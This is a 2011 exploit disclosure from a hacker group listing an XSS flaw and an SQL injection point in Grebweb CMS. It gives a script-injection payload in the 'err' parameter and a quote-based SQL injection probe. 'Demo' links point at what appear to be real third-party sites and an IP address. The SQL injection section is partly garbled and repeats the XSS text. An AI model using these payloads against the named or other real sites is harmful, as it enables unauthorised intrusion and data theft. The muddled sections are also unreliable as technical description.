__________.__                 __               ___ ___
\______   \  | _____    ____ |  | __          /   |   \  ____
 |    |  _/  | \__  \ _/ ___\|  |/ /  ______ /    ~    \/ ___\
 |    |   \  |__/ __ \\  \___|    <  /_____/ \    Y    / /_/  >
 |______  /____(____  /\___  >__|_ \          \___|_  /\___  /
        \/          \/     \/     \/                \//_____/
                                                               .ORG
----------------------------------------------------------------
Grebweb Cms <= Multiple Disclosure Vulnerabilities
----------------------------------------------------------------

# Exploit Title: Grebweb Cms <= Multiple Disclosure Vulnerabilities
# Application Name: [Grebweb Cms]
# Date: 30/12/2011
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.grebweb.com/ ]
# Impact : [ High ]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)

# Description: : Given the vulnerability you want to read files on the
server must have access

+-----------------------+
| Cross Site scripting  |
+-----------------------+

The vulnerable code is located in /admin/index.php?err=[XSS]


Proof of Concept:
-----------------


~ PoC : http://localhost/admin/index.php?err=[XSS]

  ~ Demo : http://202.71.128.172/NIHFW/admin/index.php?err="><script>alert(0)</script>

~ PoC 2

 Enter In Search Box XSS Code ~

 <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">

~ PoC : http://localhost/index.php

 ~ Demo : http://www.yagyashree.com/index.php


+-------------------+
| Sql Injection     |
+-------------------+

~ Poc 2

 Enter In Search Box XSS Code ~

 <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post">

~ PoC : http://localhost/index.php

~ PoC : http://localhost/NIHFW/view-state.php?id=[Sqli]

  ~ Demo : http://202.71.128.172/NIHFW/view-state.php?id='


[-] Disclosure timeline:

[21/12/2011] - Vulnerabilities discovered
[24/12/2011] - Others vulnerabilities discovered
[27/12/2011] - Issues reported to http://black-hg.org
[30/12/2011] - Public disclosure


# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper

b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der

THANKS TO ALL Iranian HackerZ  ./Persian Gulf

===========================================[End]=============================================